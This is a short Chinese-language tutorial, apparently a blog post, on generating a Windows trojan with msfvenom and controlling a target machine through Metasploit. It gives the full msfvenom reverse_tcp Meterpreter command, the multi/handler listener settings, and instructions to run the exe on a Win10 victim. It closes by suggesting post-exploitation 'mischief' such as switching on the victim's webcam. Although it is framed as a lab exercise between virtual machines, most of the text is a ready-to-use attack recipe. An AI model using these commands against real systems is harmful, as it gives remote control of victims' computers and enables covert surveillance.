msfvenom生成木马的简单利用

1、简介
本篇文章将会用msfvenom生成一个windows下可执行木马exe的文件，用kali监听，靶机win10运行木马程序，实现控制靶机win10。

2、实验环境
1、一台kali虚拟机  ip为192.168.110.140

2、一台win10虚拟机

3、实验步骤
1、首先使用msfvenom生成一个可以被windows执行的exe木马文件。

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.110.140 lport=4444 -f exe >shell.exe

2、把刚刚生成的exe木马文件传输到我们的win10靶机上

3、在kali上输入msfconsole打开metasploit

4、metasploit配置及监听

use exploit/multi/handler  #加载模块
 
set payload windows/meterpreter/reverse_tcp  #修改成我们之前生成木马时使用的payload
 
set lhost 192.168.110.140  #设置kali的IP地址为监听地址
 
set lport 4444  #设置监听端口

以上配置全部配置完成后我们就可以输入run然后开始监听了

 

监听好后我们就可以用win10靶机点击我们的木马程序

点击后就连接上我们的kali攻击机了

 

之后我们就可以利用metetpreter这个后渗透模块干一些骚操作了

如用webcam打开摄像头等！